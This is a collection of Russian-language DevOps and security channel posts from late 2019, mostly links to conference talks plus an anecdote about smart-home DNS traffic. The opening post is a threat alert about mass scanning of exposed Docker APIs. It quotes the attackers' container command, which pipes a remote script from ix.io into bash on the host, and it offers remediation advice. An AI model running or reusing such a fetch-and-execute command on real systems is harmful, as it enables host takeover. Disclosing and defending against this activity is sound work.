Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'",

Recons scans largely use ZMap and check the path "/v1.16/version" prior to exploitation.

Ports scanned:
2375/tcp
2376/tcp
2377/tcp
4243/tcp

Remediation recommendation:
Close Docker API ports exposed to the internet.
Terminate unrecognized running containers.

Large uptick in Docker targeted scanning activity started around midnight UTC on 2019-11-24.

Payload script http://ix.io/1XQa has zero detections on VirusTotal (https://www.virustotal.com/gui/file/d898aa7be535f3e12c4d1790abb017bf9d8003a5d9fdceb8918e3a2d8b247838/detection …) despite clear malicious activity.


Тред тут
https://twitter.com/bad_packets/status/1199087675833085959

За ссылку спасибо @ldviolet

​​Решил я тут значит эксперимент с умным домом провести, чтобы жопу от кровати не отрывать когда не хочется, а заодно и в IoT Security погрузиться, хотя бы одним глазком.

Начал с наведения порядка в домашней сети и установки Pi-Hole в качестве основного DNS с использованием DoH. Долго выбирал между DoT и DoH, но остановился все таки на последнем.

Короче, пару недель наблюдения и результаты ужасающие. Умные лампочки и розетки не отказывают себе в удовольствии держать контакт с поднебесной, хотя бы 1 раз в день, Яндекс.Станция постоянно сливает какую-то метрику, а телефоны с установленными приложениями вообще отдельная история, там такой букет...

Немного быстрых цифр:
- Яндекс.Станция за месяц выполнила более 220 000 запросов к DNS.
- Если запретить Яндекс.Станции обращаться на ее сервис метрики в течении дня, она перестает работать.
- Instagram только на одном телефоне за час успевает сделать 134 запроса.
- 1 телефон за 3 часа выполняет около 750+ запросов, из которых 280 к известным рекламным доменам.

Короче то еще дерьмо #internet_of_shit

Доклад @kvaps на HL++ 2019

Облачная платформа OpenNebula / Андрей Квапил (WEDOS Internet, a.s)
https://www.youtube.com/watch?v=47Mht_uoX3A

Markus Winand выложил свою книгу "SQL Performance Explained" для свободного скачивания до понедельника (https://twitter.com/MarkusWinand/status/1199982940471607297)

Соответственно, вот она.

Markus Winand. SQL Performance Explained. Everything developers need to know about SQL performance. 2019.

Отличный доклад Никиты Соболева "Автоматизируем все с Github Actions" с DevOops 2019

https://www.youtube.com/watch?v=QoCSvwkP_lQ

Слайды и ссылки на репы тут https://sobolevn.me/talks/devoops-2019

Дорогие читатели, запись моего доклада для Highload++ 2019 - https://youtu.be/BEZKub1BYCE

Слайд из доклада
Soup to Nuts SRE with Splunk
https://www.youtube.com/watch?v=HCP0Xy-GVjY

Слайды доклада - https://conf.splunk.com/files/2019/slides/IT1046.pdf

Он был рассказан в рамках Splunk.conf19
Плейлист тут
https://www.youtube.com/playlist?list=PLHa9lDJEhqC2jv2Oc0V-94qswd5Z4YfF1

​​Началась самая большая конференция Яндекса для разработчиков — YaTalks!

Трансляции:
Зал 1 — https://youtu.be/oOiHQ_Hdeco
Зал 2 — https://youtu.be/hXH_tRBxFnA

Программа YaTalks, Зал 1:

11.00
Открытие конференции
Александр Крайнов, Яндекс

11.15
Keynote
Андрей Стыскин, Яндекс

11.45
Перерыв

12.00
Профайлер запросов: трудный путь
Алексей Миловидов, Яндекс

13.00
Попкорн-сессия «Почему админы больше не нужны?»

14.00
Перерыв

15.00
Легенды и мифы древнего ML&AI
Евгений Россинский, ivi

15.50
Биология больших данных
Михаил Гельфанд, Российская Академия наук

16.50
Как мы научились предсказывать запрос пользователя
Алексей Шаграев, Яндекс

17.30
Попкорн-сессия «Как вырасти из разработчика в большого начальника (и нужно ли это?)»

18.30
Дебаты «Большие корпорации VS стартапы: где развиваться?»

19.30
Закрытие конференции

---------------

Зал 2:

12.00
CatBoost — первый градиентный бустинг с поддержкой категориальных и текстовых данных
Анна Вероника Дорогуш, Яндекс

12.50
Как нейросети графике помогали
Евгений Туманов, NVIDIA

13.30
Разработка и тестирование технологии роботакси
Антон Слесарев, Яндекс

14.15
Перерыв

14.30
Hardware для глубокого обучения
Григорий Сапунов, Intento

15.10
Yandex Database: как выжать 10K IOPS из HDD и вставлять в таблицу 50K записей/с на одном ядре
Алексей Станкевичус и Александр Салтыков, Яндекс

16.00
Алиса, как это работает?
Павел Капля, Никита Зубков и Олег Садовников, Яндекс

16.45
Перерыв

17.00
Как Толока росла вместе с кластером PostgreSQL
Артём Григорьев, Яндекс

17.40
Зачем сервису Такси собственная картография?
Александр Аникин, Яндекс

Подробнее: https://yandex.ru/promo/events/yatalks-moscow

Rancher Labs прям держит разработку в трендах. Rio - их новый инструмент для деплоя.

Rio makes it faster and easier for DevOps to build, test, deploy, scale and version stateless applications in any Kubernetes cluster.

Выложены доклады с DevSecCon London 2019
https://www.youtube.com/playlist?list=PLKWDDWZ_ETtBgVJEHQUAGeVA-lXwcbDfI

Список докладов
https://www.devseccon.com/london-2019/

Понравилось что много каких-то практических штук показывают, демо и т.д.

Для себя отметил три доклада

Jan Harrie - How to Secure OpenShift Environments
https://www.youtube.com/watch?v=pa4uZICJRRA

Matt Carroll - A Kernel of Truth Intrusion Detection and Attestation
https://www.youtube.com/watch?v=K6ZRAz58fiA

Brian Vermeer - Live Exploiting Your Open Source Dependencies
https://www.youtube.com/watch?v=irrN4YSRDkg

Доделал сайт флиппера. Если найдете ошибки, то пишите https://flipperzero.one/

Тут можно проголосовать за функции. Пожалуйста пройдите опрос, это важно для меня.

Все вопросы / предложения / критику нужно писать на форум forum.flipperzero.one
но только на английском

Сделал форму донатов и патренон flipperzero.one/donate

Запостил на хабр https://habr.com/ru/post/477440/

В июле проходила конференция по распределённым системам - Hydra

Доступны записи
https://www.youtube.com/playlist?list=PLC5OGTO4dWxafx2FWhL7XWzeCaHRiVanR

Список докладов
https://hydraconf.com/schedule/

Друзья, напоминаем, 5 декабря, в 19:00 начнется трансляция встречи DevOps : New Year is coming.

Ссылка на трансляцию:
https://www.youtube.com/watch?v=CVYwjqFX8XI

Для вас докладывают:
Александр Бугаев (Газпром нефть) - Корпоративный OpenShift (Security Design&Architecture).
- предпосылки внедрения OSCP в ГПН
- корпоративные требования ИБ для платформы контейнеризации
- процессы и инструменты DevSecOps

И Александр Чистяков - «Базы данных в Kubernetes: проблемы развёртывания и эксплуатации»

Сегодня начался Heisenbug 2019 в Москве (конференция про тестирование)

Трансляция первого дня их первого первого зала
https://www.youtube.com/watch?v=sTdKN68O3UQ

Расписание доступно тут
https://heisenbug-moscow.ru/schedule/

Трансляция началась
https://www.youtube.com/watch?v=CVYwjqFX8XI

From: Qualys Security Advisory

Subject: Authentication vulnerabilities in OpenBSD

https://www.openwall.com/lists/oss-security/2019/12/04/5

Открыточка для @SysadminNotes

Space — это интегрированная среда для командной работы. Основная функциональность Space включает в себя хостинг Git-репозиториев, код-ревью, автоматизацию (CI/CD) на основе Kotlin-скриптов, репозитории пакетов, инструменты планирования, трекер задач. Для продуктивного общения в Space предусмотрены профили команд и сотрудников, чаты, блоги, календари, возможность планировать встречи и многое другое. 

Встречайте Space — новый продукт от JetBrains
https://habr.com/ru/company/JetBrains/news/t/478866/

Why Does Developing on Kubernetes Suck?

https://blog.tilt.dev//2019/08/21/why-does-developing-on-kubernetes-suck.html

Прямая трансляция OWASP Moscow Meetup #9
https://www.youtube.com/watch?v=IS709t0eOqM